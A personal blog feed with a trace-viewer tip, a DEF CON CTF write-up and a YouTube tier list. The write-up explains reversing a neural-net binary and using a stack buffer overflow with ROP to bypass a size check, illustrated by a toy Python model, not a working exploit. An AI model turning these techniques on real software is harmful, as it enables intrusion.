Perfetto, Tracy and Speedscope can all visualize the same JSON format with different UIs and potentially without a trace size cap.
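Here's a minimal sketch of the tagging and flow-arrow tips in Python. The helper names (`build_trace`, `flow_arrow`, `write_trace`) and the `"demo"` category are made up for illustration, and the flow fields (`"ph": "s"`/`"f"`, a shared `"id"`, `"bp": "e"`) are my reading of the Trace Event Format, so check them against the viewer you use.

```python
import json

def build_trace(spans, slowest_n=100):
    """spans: list of (name, start_us, dur_us, tid) tuples; timestamps in microseconds."""
    # Indices of the slowest spans, so they can be found by typing e.g. "top100"
    # into the search bar (search also matches argument values).
    by_duration = sorted(range(len(spans)), key=lambda i: spans[i][2], reverse=True)
    slowest = set(by_duration[:slowest_n])
    events = []
    for i, (name, ts, dur, tid) in enumerate(spans):
        args = {"id": "span-%d" % i}
        if i in slowest:
            args["tag"] = "top%d" % slowest_n
        events.append({"name": name, "cat": "demo", "ph": "X", "ts": ts,
                       "dur": dur, "pid": 1, "tid": tid, "args": args})
    return events

def flow_arrow(flow_id, src, dst):
    """Arrow from span src to span dst (same tuple shape as above)."""
    common = {"name": "dep", "cat": "demo", "id": flow_id, "pid": 1}
    start = dict(common, ph="s", ts=src[1], tid=src[3])
    # bp="e" asks the viewer to bind the arrow end to the enclosing slice.
    end = dict(common, ph="f", bp="e", ts=dst[1], tid=dst[3])
    return [start, end]

def write_trace(path, events):
    with open(path, "w") as f:
        json.dump(events, f)
```

For example, `write_trace("trace.json", build_trace(spans) + flow_arrow(1, spans[0], spans[2]))` produces a file you can drag into the viewer.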

Reverse engineering an AI spaceship game at DEF CON CTF

2020-08-15T00:00:00+00:00

I recently played with Samurai in the DEF CON CTF 2020 finals, and want to write about an incredibly cool challenge I worked on called ropshipai. It involved reverse engineering a binary to discover the architecture and format of a neural network, creating a network to control your spaceship in an arena against all the other teams, then doing a ROP exploit using a buffer overflow to get more capacity for a smarter AI. I hope this article can give you a taste of what high level security CTF contests can be like and why they’re so fun.

Here’s what it looked like near the end of the contest, I cherry-picked a round where our final bot (labeled ‘X’ in light grey) won:

[Video: a round from near the end of the contest]

Part 1: Reverse engineering

We were given a download which included a PyGame UI to simulate the game. The UI called out to an x86 binary which we figured out computed the move for a team’s bot using an input file. We figured that file was probably the same thing the “Upload AI” button on the challenge’s web portal accepted. There was a challenge a previous year called “ropship” that involved a similar arena with bots controlled by return-oriented programming and we assumed the “AI” added this year meant a neural net, but didn’t yet see any of the organizers’ usual Tensorflow.

So we started reversing the binary, and my teammates found various functions that seemed to do floating point math and loops, which they started using IDA’s decompiler on and matching up with common neural net functions. They quickly found ReLU, then an iterative function that we figured out produced results matching e^x. We also found a function that at first appeared to be 1/(1-e^(-x)), which was confusing since that’s almost a sigmoid but with subtraction instead of addition. I took a look in Binary Ninja and it looked like addition to me, it turned out IDA had just decompiled it wrong and it was a sigmoid.
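For reference, here's roughly what those functions compute, as a Python sketch. The Taylor series is only an assumption about how an iterative e^x might be written, not something recovered from the binary, and the function names are mine.

```python
import math

def exp_series(x, terms=30):
    """Approximate e^x by summing the first `terms` terms of its Taylor series."""
    total, term = 1.0, 1.0
    for n in range(1, terms):
        term *= x / n          # term is now x^n / n!
        total += term
    return total

def relu(x):
    return max(0.0, x)

def sigmoid(x):
    # The real sigmoid: note the plus sign in the denominator.
    return 1.0 / (1.0 + exp_series(-x))

def misdecompiled(x):
    # What the confusing decompilation suggested: a minus sign instead.
    return 1.0 / (1.0 - exp_series(-x))
```

The two formulas are easy to tell apart by plugging in 0: the sigmoid gives exactly 0.5, while the subtraction version divides by zero.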

That left the big function with lots of math and loops, which we assumed was the main network evaluation function. I got to work using the new decompiled view in Binary Ninja to try and decipher what it was doing and what the structure of the inputs we had to give it was, while my teammate samczsun figured out the input file parsing code that set up those inputs. At the same time, other teammates figured out the simulator and what inputs it could feed to the network.

I reverse-engineered all the pointer arithmetic and simplified things to write out a pseudo-C version of the network evaluation function. It seemed to evaluate a number of linear layers with biases, each followed by either a sigmoid or ReLU activation function (chosen by the input file). The input parsing code hard-coded the number of hidden layers between the input and output layer equal to 1, which was weird and fishy.

Once we had collectively figured out how everything fit together, we wanted to get a bot out there and earning points as fast as possible. First aegis wrote a Python network serializer script and deployed a bot that just set the bias on going forward to run us into the wall so we were a smaller target and not in the expected position for anyone managing to shoot. The next bot had hand-designed weights in the matrices to rotate the ship unless it was ready to fire in which case it shot. We weren’t quite the first to upload a non-empty network (an empty file just shot the wall) but we were something like 2nd.
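The evaluation function and the bias-only first bot can be sketched in a few lines of Python. This is a reconstruction from the description above, not the binary's actual code: the layer tuple layout and the choice of which output means "go forward" are hypothetical.

```python
import math

def relu(x):
    return max(0.0, x)

def sigmoid(x):
    return 1.0 / (1.0 + math.exp(-x))

ACTIVATIONS = {"relu": relu, "sigmoid": sigmoid}

def linear(weights, biases, inputs):
    # weights[i][j] multiplies inputs[j] when computing output i.
    return [sum(w * x for w, x in zip(row, inputs)) + b
            for row, b in zip(weights, biases)]

def evaluate(layers, inputs):
    """layers: list of (weights, biases, activation_name), applied in order."""
    values = list(inputs)
    for weights, biases, activation in layers:
        act = ACTIVATIONS[activation]
        values = [act(v) for v in linear(weights, biases, values)]
    return values

# A bias-only bot: all weights are zero, so the inputs are ignored and the
# output biases alone decide the action. Output 0 is "forward" (hypothetical).
zeros = [[0.0, 0.0], [0.0, 0.0]]
always_forward = [
    (zeros, [0.0, 0.0], "relu"),
    (zeros, [5.0, -5.0], "sigmoid"),
]
```

Whatever the ship sees, `evaluate(always_forward, inputs)` returns a high first output and a low second one, which is all that first bot needed.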

Part 2: Training a better network

While aegis worked on making a smarter hand-coded bot, I started work on training a real neural net to be a better AI. An alternative I brought up was to write something to compile a domain specific language to weights, using the fact I had learned about in my university machine learning course that you could approximate any function using only one hidden layer by using a specific method of engineering weights to set the value of the output for different regions of input. However, given that both aegis and I had done some deep learning training before we figured it would be easier to just use gradient descent.

I fired up a Jupyter notebook, replicated the architecture, and thought of a way to make a basic AI by writing a Python function to output what we wanted the AI to do given various inputs, and feeding lots of randomly generated input vectors through the function and training the neural net to match those actions like a normal supervised classifier.
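The setup looks something like this sketch. It's a pure-Python stand-in, not the PyTorch notebook from the contest: a single logistic unit replaces the real network, and the one-input `teacher` function is a hypothetical scripted policy chosen to keep the example tiny.

```python
import math
import random

def teacher(x):
    """Scripted policy to imitate: action 1 if the input is above 0.5, else action 0."""
    return 1 if x > 0.5 else 0

def sigmoid(z):
    # Numerically stable for large negative z.
    if z >= 0:
        return 1.0 / (1.0 + math.exp(-z))
    e = math.exp(z)
    return e / (1.0 + e)

def make_dataset(n, seed=0):
    # Label randomly generated inputs with whatever the scripted policy would do.
    rng = random.Random(seed)
    return [(x, teacher(x)) for x in (rng.random() for _ in range(n))]

def train(data, steps=2000, lr=1.0):
    """Full-batch gradient descent on cross-entropy loss for p = sigmoid(w*x + b)."""
    w, b = 0.0, 0.0
    for _ in range(steps):
        grad_w = grad_b = 0.0
        for x, y in data:
            err = sigmoid(w * x + b) - y   # derivative of the loss w.r.t. w*x + b
            grad_w += err * x
            grad_b += err
        w -= lr * grad_w / len(data)
        b -= lr * grad_b / len(data)
    return w, b

def accuracy(params, data):
    w, b = params
    hits = sum((sigmoid(w * x + b) > 0.5) == bool(y) for x, y in data)
    return hits / len(data)
```

Calling `accuracy(train(make_dataset(200)), make_dataset(200, seed=1))` checks how well the trained unit matches the policy on inputs it hasn't seen.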

Unfortunately it was harder than I expected and it took annoyingly long tuning hyperparameters and how my training setup worked before I even managed to train a network to do one action if the single input was less than 0.5 and another if it was greater:

Next I worked on modifying aegis’s code, which wrote out his hand-coded weights in the correct format, to take the weights from my trained model. Unfortunately the first network I exported this way just didn’t do anything when run in the simulator. So I spent some time investigating the polarity of how PyTorch did biases, trying out different combinations and reasoning through whether I wanted to write things out in row-major or column-major order, all to no avail. I even wrote some code to export aegis’s hand-coded weights using my exporter, and that worked but my model still didn’t.
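To show what the row-major versus column-major question amounts to, here's a small sketch. The challenge's real file format isn't described in this post, so the little-endian float32 packing is purely an assumption. One thing that is certain is that PyTorch's nn.Linear stores its weight as an (out_features, in_features) matrix, so the two orders give genuinely different files.

```python
import struct

def flatten(matrix, order="row"):
    """Flatten a list-of-rows matrix in row-major or column-major order."""
    if order == "row":
        return [v for row in matrix for v in row]
    n_rows, n_cols = len(matrix), len(matrix[0])
    return [matrix[r][c] for c in range(n_cols) for r in range(n_rows)]

def pack_floats(values):
    # Hypothetical on-disk encoding: little-endian 32-bit floats, back to back.
    return struct.pack("<%df" % len(values), *values)

weights = [[1.0, 2.0, 3.0],
           [4.0, 5.0, 6.0]]   # 2 outputs x 3 inputs
row_major = pack_floats(flatten(weights, "row"))
col_major = pack_floats(flatten(weights, "col"))
```

If the reader expects one order and the exporter writes the other, every weight still loads fine but lands in the wrong place, which is why this kind of bug produces a bot that runs but does nonsense rather than a crash.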

So after around 2 hours I tried using GDB to trace the execution of my model through the binary while referencing the disassembly in Binary Ninja, to see what was going wrong. To my surprise it seemed to exit before it even ran my model, and exited with a weird error code. I bisected it down to find a validation function that limited hidden layer size to a 2x2 matrix, way too small to train anything significant. I posted the bad news in Slack and it turned out samczsun had figured this out a while ago but in the hectic phase of everyone working on different reverse engineering in parallel, the rest of us didn’t hear.

Part 3: The exploiting and fancier bots

It looked like the “rop” in the challenge name wasn’t just a callback to last year’s “ropship” challenge and we’d have to exploit our way into more model capacity. We had already found a buffer overflow on the stack with unbounded user-controlled contents, in the code which fetched the inputs to feed to the network. It seemed like we could craft a ROP exploit to manipulate the size parameters of the network to change them after they had been validated. ROP is a technique where if you can overwrite the address the function call should return to on the stack, you can make it return anywhere you want, allowing you to execute any sequences of suffixes of any functions in the program to perform your exploit. There was a seccomp policy and some weird custom “ASLR” and “sandboxing” that simultaneously made some ROP a bit easier while keeping things contained so we couldn’t easily just break out and exploit the challenge or run arbitrary code as our AI.
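If you haven't seen ROP before, this toy Python model might help. It is not the actual exploit and doesn't touch real memory: the fake addresses, the two "gadgets" and the frame layout are all invented to show how overflowing a buffer lets the input choose what runs on return.

```python
def run_vulnerable(user_input, buffer_len=4):
    state = {"hidden_size": 2, "log": []}   # 2 stands for the validated size

    def gadget_set_size(stack):
        # Like a `pop reg; ret` gadget: takes its argument from the stack.
        state["hidden_size"] = stack.pop()
        state["log"].append("set_size")

    def gadget_exit(stack):
        state["log"].append("exit")
        stack.clear()

    gadgets = {0x1000: gadget_set_size, 0x2000: gadget_exit}

    # Hypothetical frame layout: buffer slots, then the saved return address.
    frame = [0] * buffer_len + [0x2000]      # a normal return goes to "exit"

    # The bug: the copy has no bounds check, so long input overwrites the
    # return address and keeps writing past it.
    for i, value in enumerate(user_input):
        if i < len(frame):
            frame[i] = value
        else:
            frame.append(value)

    # "Returning": everything past the buffer is consumed as return
    # addresses and gadget arguments, one after another.
    stack = list(reversed(frame[buffer_len:]))   # end of list = top of stack
    while stack:
        gadgets[stack.pop()](stack)
    return state

benign = run_vulnerable([1, 2, 3])
attack = run_vulnerable([0, 0, 0, 0, 0x1000, 64, 0x2000])
```

The benign input just returns to `exit`, while the attack input chains `set_size` with an argument of 64 before exiting, changing a value after the point where it would have been checked.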

I’ve never done ROP so aegis and samczsun started work on that while I patched out the validation in my personal copy of the binary and got to work on training a better bot to work with the eventual exploit. In the meantime chainsaw10 had written some better Python AI functions using a patched simulator to test them out, which I worked on training a model to match. It was again surprisingly difficult. I had a lot of trouble getting it to be able to do actions like shielding, which only needed to happen on around 5% of random inputs. The network would just always output 0.0 for those actions except on some lucky training runs. I suspect something was going wrong with my initialization or gradients such that on most runs the shield output would fall into a place it could never get a gradient signal to recover from.

Three hours later at around 6am I managed to get a basic AI trained which turned towards the closest bot, moved towards it, shot at it and shielded. At that point I went to sleep, the contest had been on a 9 hour pause and I intended to wake up again before it restarted, when the exploit would hopefully be finished.

I ended up sleeping past my alarm until 2 hours after the contest started again. When I woke up, aegis and another teammate had finished the ROP exploit and written a converter that added the exploit to the latest bot I trained, and it was deployed and doing decently! The exploit development had hit some snags but eventually landed on something which overwrote the return address to restart the execution of the function with the buffer overflow multiple times to get various things overwritten, to patch in a new network after the hidden size validation had passed on the original overflowing network.

Unfortunately the bot we uploaded was still kind of crappy, it knew how to move around the arena towards a target but it kept doing that until it was right on top of them and then often died if the opponent then shot us at point blank range. It also only used the sine of the angle to the enemy so due to an ambiguity it would sometimes run in the exact opposite direction.
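The ambiguity comes from sin(θ) = sin(π − θ): an enemy ahead and to one side has the same sine as one behind and to the same side. A quick sketch, with feature function names that are mine rather than from our bot code:

```python
import math

def features_sine_only(angle):
    return (math.sin(angle),)

def features_sin_cos(angle):
    # Adding the cosine removes the ambiguity: together the pair pins down the angle.
    return (math.sin(angle), math.cos(angle))

def recover_angle(features):
    sin_value, cos_value = features
    return math.atan2(sin_value, cos_value)

ahead = math.radians(30)     # enemy in front, slightly to one side
behind = math.radians(150)   # enemy behind, same side
```

With sine alone the two situations produce the same input, so no amount of training can tell them apart. With both sine and cosine the cosines have opposite signs and `recover_angle` gets the original angle back.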

So aegis and I worked on a better training setup with a GPU box and larger networks. In the meantime chainsaw10 had improved the AI function to not get too close to enemies and also be able to dodge bullets. We still had tons of trouble reliably training a network to match the function, but eventually ended up with a slightly better version of our previous bot and a version without very good aim trained on our new bot code. In simulations with our own bots the very accurate but simpler bot did better, so we uploaded that, but an hour later and one hour before the end of the contest I saw it wasn’t actually doing well against the other teams, so I uploaded the more sophisticated bot and it did much better and even managed to win a few rounds. It still had crappy aim and sometimes did the wrong thing though, and it had taken a lot of tweaking to get it to learn to shield.

Postscript: Compiling to neural nets

In hindsight given how much trouble we had training our small neural networks, in what seemed like it should have been a really easy task, it seems like the best approach was to use the universal function approximation proof style tricks to write a compiler from a logic DSL to network weights that exactly implemented the function. I’m still not sure whether we had a hard time training because training shallow networks with small capacity is just hard, or there was some technique we were missing to get our training to work well.

In the last two hours of the contest I worked on a prototype of the compiler approach for fun and managed to get it mostly working. I was using only one hidden layer so my input DSL required providing some constant thresholds on inputs, AND gates on those threshold signals, and then each output was an OR of some of the AND results. This was enough to implement any truth table on thresholds, but it was incredibly wasteful of network capacity to do so and the flattening of the decision tree to a truth table still needed to be done manually. I had some ideas for how to automatically flatten a decision tree Python function into a truth table though using overloaded operators that detected thresholding on the inputs and breadth-first searched to explore the space of outputs, but the contest ended and I wanted to catch up on sleep after that.
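Here's a minimal sketch of the AND/OR part of that idea, not my contest prototype. It assumes the threshold signals are already available as 0/1 inputs, uses steep sigmoid units to imitate gates, and all the names and the `STEEPNESS` constant are made up for illustration.

```python
import math

STEEPNESS = 20.0  # larger values push each sigmoid closer to a hard 0/1 step

def sigmoid(z):
    return 1.0 / (1.0 + math.exp(-z))

def and_unit(n_inputs, positive, negated=()):
    """Hidden unit that fires when every `positive` input is 1 and every `negated` input is 0."""
    weights = [0.0] * n_inputs
    for i in positive:
        weights[i] = STEEPNESS
    for i in negated:
        weights[i] = -STEEPNESS
    # Pre-activation is +STEEPNESS/2 when satisfied, at most -STEEPNESS/2 otherwise.
    bias = -STEEPNESS * (len(positive) - 0.5)
    return weights, bias

def or_unit(n_hidden, members):
    """Output unit that fires when any hidden unit listed in `members` fires."""
    weights = [STEEPNESS if i in members else 0.0 for i in range(n_hidden)]
    return weights, -STEEPNESS * 0.5

def unit_output(unit, inputs):
    weights, bias = unit
    return sigmoid(sum(w * x for w, x in zip(weights, inputs)) + bias)

def run(hidden_units, output_units, signals):
    hidden = [unit_output(u, signals) for u in hidden_units]
    return [unit_output(u, hidden) for u in output_units]

# Truth table for XOR as one row per hidden unit: (a AND NOT b) OR (NOT a AND b).
xor_hidden = [and_unit(2, positive=[0], negated=[1]),
              and_unit(2, positive=[1], negated=[0])]
xor_output = [or_unit(2, members={0, 1})]
```

Each truth-table row that should produce an output costs one hidden unit, which is the wastefulness mentioned above: the hidden layer grows with the number of rows rather than with the size of the original decision tree.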

I talked to my friend on team PPP, since PPP had a bot with really good clean behavior. He said that PPP did go the route of implementing a compiler to network weights, which could compile an arbitrary decision tree that included vector space arithmetic. They did it without flattening the tree by using multiple hidden layers, which the exploit allowed you to use. Unfortunately while as far as we could tell we should have been able to use multiple hidden layers, when we tried a multi-layer network it failed to do anything, and we never bothered to figure out why, since our training process worked about as well with one hidden layer.

Conclusion

Overall this is the challenge I had the most fun with this DEF CON CTF finals, it combined reverse engineering, neural nets and exploitation, and had different possible valid approaches to solve it. It was super fun to upload an AI and see it dodge bullets and beat other teams based on a tower of hard-won knowledge and code from hours of work reverse engineering and tinkering. In general I get really into DEF CON CTF challenges because they’re a great combination of tractable problems I can work with friends on with fun competitive time pressure, that also are really interesting and difficult to make me feel like I’m exercising all of my available skill.

This was only the last challenge I worked on. Earlier in the contest I worked on rorschach helping aegis by figuring things out and coming up with tweaks to make our black box hill climbing solver exploit a neural net classifier faster, and coming up with defensive checks against other teams’ attacks. In the middle I did miscellaneous reverse engineering and spent hours working on attacks for exploits teams patched before we were done implementing them, and an AI for another multi-team game that closed before I could deploy it. My other AI did have the best dang debugging visualizations a rushed CTF hack has ever seen though thanks to my affinity for HoloViews, which might have had a little to do with why it was too late…


My tier list of interesting YouTube channels

2020-07-19T00:00:00+00:00

I watch a lot more YouTube than I do any other type of video content, and my favorite type of YouTube videos are interesting ones. I hesitate to call them “educational”, because they’re often not necessarily trying to teach, but to me the category distinction is they’re trying to be interesting in some way that pertains to the real world rather than just purely entertaining like video game content or comedy.

I often find myself recommending these channels to friends, so I figured I might as well write up my endorsements, and I made it a tier list since I love the format. There’s a huge variety of really cool and impressive channels out there with kinds of content you can’t find anywhere else, and I’ve watched a lot of them for years and want to highlight them. The tier choices can be kinda arbitrary and I didn’t pay any attention to the ordering within tiers. Note that this is a tier list of my favorite interesting YouTube channels:

“my”: These are ordered based on what I feel like endorsing/recommending, other people with different interests may place them higher or lower, and some really well-made popular channels are lower down just because they don’t capture me as much.
“favorite”: Even once we get down to “D tier” they’re still great stuff I watch regularly and above everything I’ve encountered and wasn’t into.
“interesting”: There’s other YouTube channels I watch and enjoy, like some video game channels, which are more pure entertainment and aren’t included here.

My blog posts tend to be about programming but I barely watch any programming channels. I mostly watch all sorts of random interesting channels on everything from machining to videography. Most of these channels are pretty accessible to anyone interested even if they aren’t versed in the subject, while still often targeting something obscure or impressive rather than always basic stuff, which is something that I think YouTube channels tend to do better than blogs. But on the flipside this makes most programming channels less interesting to me, since I am versed in the subject.

S Tier: Masterpieces

The channels in this tier are some of my favorite things on the internet. They all only release videos every few weeks or months but that’s because they’re all a single person putting monumental effort into each one. When a video comes out on one of these channels it’s the highlight of my day. For a video to be this tier it needs to be fascinating, well-produced, demonstrate incredible skill I can be in awe of, and be something I’d pay at least $5/video (and often more) if they started paywalling it now. I subscribe to all of these channels on Patreon, except for Kiwami Japan because they don’t have one.

Despite having hundreds of thousands to millions of viewers, none of these channels would ever have been green-lit as a TV show as-is, because they’re too weird or niche or technical. They also can only really work as well as they do in the video format, and got their start on YouTube. I’m happy that the modern internet allows channels like these to not only exist but often make a living.

Clickspring

Clickspring is a channel about clockmaking, and watching it is wireheading on pure craftsmanship. I’ve never done any machining and don’t plan on ever making a clock, but his videos along with everything he makes in them are gorgeous examples of making everything with care and a commitment to excellence. This shows through in everything he does, from making custom screws with stunning blue oxide finish and hand-rounded interior ends that aren’t even visible when assembled to doing original research and building some authentic ancient tools for his reconstruction of the Antikythera mechanism. He puts the same care into his videos as the work itself: the camera shots and lighting are beautiful, the machining operations are seamlessly sped up at the right times to fit in the video but show the key moments, and he often includes nice composited overlays of the CAD model on top of the raw stock so you can understand what he’s doing, and the narration, music and sounds of the machining are excellently done to give the videos a relaxing feel. Every Clickspring video is just a delightful experience to watch.

He also does videos without narration that just beautifully show all the machining and other work that goes into making something, this video being the most impressive example. He has a second channel called Clickspring Clips where he posts 2-4 minute non-narrated videos showing the making of one interesting part of his larger projects. His Patreon also has many exclusive videos once you watch all the public ones.

Applied Science

Ben Krasnow’s channel Applied Science has been the flagship channel of engineering and science YouTube for many years. In every video he explains some new and interesting piece of science and engineering he’s replicated in his shop. He’s made aerogel, a water jet cutter, a plasma sputtering chamber, an EDM drill, air bearings, an electroluminescent display, an LCD, and the source of his earliest publicity: a scanning electron microscope. He’s a truly prolific and incredible engineer who works with all kinds of electronics, machining, chemistry, physics and software. Every video leaves me in awe of him. Often he’ll be the first non-professional to try recreating something based on a procedure from papers and have to do dozens of failed experiments before making a video documenting the process and all the extra considerations. His videos and skill are incredible and I’ve learned a lot about the process of scientific lab work from watching them.

Captain Disillusion

Captain Disillusion has been on YouTube for 12 years now, originally in obscurity but gradually growing to millions of viewers. He goes over trick and hoax viral videos and explains the visual effects used to make them. The thing that’s incredible is the production value: Costumes, makeup, well-written scripts, and a ridiculous density of impressive visual effects. Captain Disillusion is what happens when an incredibly talented and driven visual effects artist puts an entire month of full time work into every single 5 minute video. He’s done streams and time-lapses before of him spending dozens of hours on a 3 second visual effect for a throwaway gag.

A typical video consists of a well-written and edited intro of him introducing a faked video, doing a detailed breakdown of all the components of the effect but quickly thanks to amazing visual aid footage, then him just one-upping the original video by doing the effect so much better than anyone else has ever done it, without the tells he went over. Here are some other good ones, but really every single one is excellent.

Kiwami Japan

This is a weird and wonderful channel that to me really exemplifies what’s great about YouTube. Most videos are of the form “sharpest X kitchen knife in the world” with a thumbnail of a hand holding a weird knife in the same pose. Some examples of X are “Fungi”, “Paper”, “milk”, “Pasta”, “Underwear”, and “smoke”. I originally ignored suggested videos from this channel because I assumed they were some weird click-bait that didn’t really make a knife from those materials, and that was tragic because he really does and it’s amazing.

Every video has no talking or words except for occasional subtitles, and follows the process starting from the raw material, demonstrating all the processing steps required to make a hard substance out of it, casting a knife blank, sharpening it, and testing it. At some point early in the channel’s history someone must have commented that the videos were like ASMR videos because after that he got a high quality microphone and puts a lot of emphasis on the sounds.

The coolest part is he’s clearly really good at materials science and every video has amazing steps all done in his apartment. Let’s take the “sharpest Seawater kitchen knife in the world” video as an example: It starts with a shot of him getting huge jugs of seawater from the ocean and collecting shells on the beach. At home he boils the seawater into salt and a solution he labels “magnesium chloride”. Then he puts a seashell on top of a charcoal briquette and puts it in an insulating firebrick box in his home microwave-oven-thing and cuts to it coming out totally calcified (apparently you can do that without a furnace??). He grinds it up with the subtitle “quicklime”, puts it in water and uses a thermal camera to show the exothermic reaction to get slaked lime. Cut to him combining a concentrated sea brine with the lime water to get “magnesium hydroxide + salt”. He adds water to dissolve the salt and filters out the magnesium hydroxide, combines it with the magnesium chloride from earlier, dries it, uses his handy durometer to show it fails a hardness test. He pops the magnesium hydroxide in his charcoal microwave furnace to get “magnesium oxide” and shows that this time when combined and dried it yields a very hard rock-like substance. Cut to him pouring a bunch of it in a rectangular plastic box, drying it and sawing out a knife shape. Then his famous sharpening sequence with increasingly fine knife stones, followed by the ever-present cucumber chopping test (complete with weird cucumber reveal out of Godzilla-themed rubber gloves). He finishes by showing that the “magnesium cement” (Wiki link) doesn’t immediately dissolve in water and that it can also be combined with dirt to make bricks.

I can’t see anything remotely like this ever being green-lit as a TV series, but every video is brilliant and relaxing, they all get millions of views with zero advertising spend, because everyone likes them and recommends them to friends and algorithmic recommendations respond to that in a way that human TV producers wouldn’t have the guts to. People complain about the “YouTube algorithm”, but at this kind of thing it truly shines.

Stuff Made Here

Stuff Made Here is the newest channel to enter S tier. When YouTube first recommended one of his videos to me 4 months ago the channel had just started with a few videos and I thought “huh how is this brand new channel getting hundreds of thousands of views”, then I watched the video and thought “okay wow, apparently if you make really excellent stuff from the start it can become popular on YouTube super fast”. He just makes really interesting and impressive videos where he uses his skill in many different disciplines of engineering to make cool stuff and then gives interesting descriptions of all the considerations, testing, engineering, fabrication and failures that went into making it.

For his most popular video he makes a basketball backboard that always directs the ball into the hoop. He designs and builds a custom mechanism to move the backboard to any distance and angle using rods that minimize the weight on the board so it can move quickly, describing the kinematic principles and how he constructed it using CNC plasma cut and spot welded sheet metal with 3D printed joints. Then he describes the clever custom algorithm for filtering out the basketball from other moving objects in the depth camera by fitting a ballistic curve to all possible object trajectories, as well as the software for extrapolating and calculating the required backboard position. The way he did everything is quite impressive and, like all his projects, he did it in only a few weeks while also having a day job.
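To give a flavor of the trajectory filtering idea, here's a rough Python sketch. It is not his algorithm, and it swaps curve fitting for a simpler stand-in: checking whether evenly spaced height samples have the constant downward acceleration of a thrown ball. The function names and the tolerance are my own assumptions.

```python
def second_differences(values):
    """Discrete second derivative (times dt squared) of evenly spaced samples."""
    return [values[i + 2] - 2 * values[i + 1] + values[i]
            for i in range(len(values) - 2)]

def looks_ballistic(heights, dt, g=9.81, tol=0.05):
    """True if heights (meters, sampled every dt seconds) accelerate at about -g throughout."""
    if len(heights) < 3:
        return False
    return all(abs(d / dt ** 2 + g) <= tol * g
               for d in second_differences(heights))

dt = 0.05
times = [i * dt for i in range(10)]
thrown_ball = [2.0 + 5.0 * t - 0.5 * 9.81 * t * t for t in times]   # free flight
walking_person = [1.7 for _ in times]                               # constant height
```

A ball in free flight passes the check while something moving at a steady height, like a person walking past, does not. A real system would also need to cope with sensor noise, which is where fitting a curve to many samples earns its keep.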

What sets him apart from other YouTube makers is not only the skill in so many different areas that his projects display, but also the detailed explanations of the entire engineering process including the considerations, math, algorithms and failures rather than just the fabrication. If this sounds good to you, you should watch every single one of his videos including the ones that might not look that interesting. There’s not that many yet, but there might be soon since he somehow has also been managing to post more frequently than anyone else in my S tier (have I mentioned he also has a day job!?).

A Tier: Highly recommended

These channels are still quite excellent, but fall short on one or more aspects that would make me feel like putting them in S tier. I still highly recommend you check them out if they sound interesting though, they’re really great and I’m still very excited when I see one of them post a new video!

Tech Ingredients: Long and detailed technical videos of interesting projects demonstrating cool science and engineering concepts. They build really high quality demonstration pieces for each video and lots of the concepts they look into are little known ones like magnetohydrodynamics, how helium is an incredibly good sound suppressor and plasma physics. The main presenter is super knowledgeable and every video has some really interesting things. It’s a bit slow paced but I fix that by always watching on 2x speed. They also just posted a Best Of clips compilation video.
Practical Engineering: Explains interesting things from civil engineering often with cool models and demonstrations. I found this one on hydraulic ram pumps really cool.
Dan Gelbart: Dan is an incredible engineer who made a fortune selling companies and now has an amazing machine shop, with lots of tools he’s built or modified himself. He doesn’t post videos very often but the main draw of his channel is the 7 year old 19-part series on tools and techniques for building prototypes. It’s a masterpiece of incredible knowledge, impressive designs and great tips. I recently rewatched the whole series.
NightHawkInLight: Videos of small interesting projects beautifully filmed and explained. I particularly liked this one about making a carbon filament light bulb.
The Thought Emporium: Lots of different types of DIY science projects including DIY genetic engineering. In his craziest video he engineers a benign virus to put lactase genes in his intestines to cure his lactose intolerance for months (most of the video is explaining why what he did was reasonably safe). More recently he’s been uploading long live streams but look back a bit for the shorter science project videos.
Primitive Technology: Guy goes out into the woods in Australia and makes pottery, metal, shelter, tools and materials starting with no tools at all. This video about making a kiln to smelt iron is really good.
NileRed: Beautiful and interesting videos about chemistry accessible to someone who knows very little about chemistry. This recent video about making superconductors is particularly good.
This Old Tony: Really well-produced entertaining and funny machine shop and engine videos that usually use some small machining project to explain a concept or technique.
Steve Mould: Interesting science concept explanation videos with demonstrations. I was waffling between A and B tier but this phenomenally cool recent video on optical rotation blew me away and secured his spot in A tier.

B Tier: Very Good

At this point we’re still in the realm of high quality channels where I’ll immediately watch any new video they put out. Some of these channels have occasional top quality videos that would put them in A tier if they posted more regularly or had more consistent quality.

The Hacksmith: Skilled engineers with a substantial budget and machine shop try to make real life versions of gadgets from fiction. Their main audience is kids and non-technical people and it shows, but many of their videos have pretty cool engineering, and their build montages are neat.
Technology Connections: Guy explains interesting bits of technological history and science behind everyday gadgets. Like this video on how rice cookers use some neat physics tricks.
Tier Zoo: A biologist explains interesting animal facts as funny parodies of video game commentary and tier lists (I am partial to the tier list format as evidenced by this very tier list). This one on turtles is pretty good.
Sam Zeloof: One of the only people to successfully produce a silicon integrated circuit at home, and when he was in high school. This year he started putting out high-effort videos on cool equipment used in the process.
Tom Stanton: Implements really creative and cool engineering ideas mostly using a lot of 3D printing. Some of his coolest videos are building drones using weird things like gas thrusters, reaction wheels, the Coanda effect and a single rotor with no swashplate.
Demoscene High-Quality Videos: 64k intros, where people write programs that produce beautiful visuals and audio using an executable less than 64 kilobytes, are perhaps my favorite art form across all art forms. They often use very non-standard rendering techniques that lead to unique visuals, have good electronic background tracks, and the whole time I marvel at the technical wizardry of the tiny size. Not all the best videos are on this channel and not all the ones on this channel are good but it has many good ones. My favorite intro group is Logicoma, even before I found out they use Rust. My favorites of their stuff: Engage, Dope On Wax, Trash Panda and Elysian. Favorites by other groups include on, Zetsubo (4k!), delight, Offscreen Colonies and the timeless.
CNLohr: Really interesting and cool electronics projects. Examples include reverse engineering the HTC Vive and making a custom Linux C SDK for it, running a custom Minecraft server on a microcontroller and pretty LEDs.
Inigo Quilez: Inigo is famous for his excellent website with lots of computer graphics tips especially around signed distance fields. More recently he’s been uploading high effort explanations, live coding and pretty fractals to his YouTube channel.
Tom7/suckerpinch: Tom7 is known for his incredibly good high-effort SIGBOVIK technical joke conference papers. What I only learned later is that he often makes great funny YouTube videos explaining his crazy hacks.
Real Engineering: Well-produced and interesting explanation videos on various engineering topics. From the engineering of fighter planes to flood control systems in The Netherlands.
Tom Scott: Popular channel mostly focusing on talking about random interesting places with neat stories around the world.
You Suck At Cooking: Funny comedy cooking videos that are actual recipes. Videos vary on how much they focus on being funny vs teaching good recipes. This one and this one are pretty good.

C Tier: Someone being really good at something

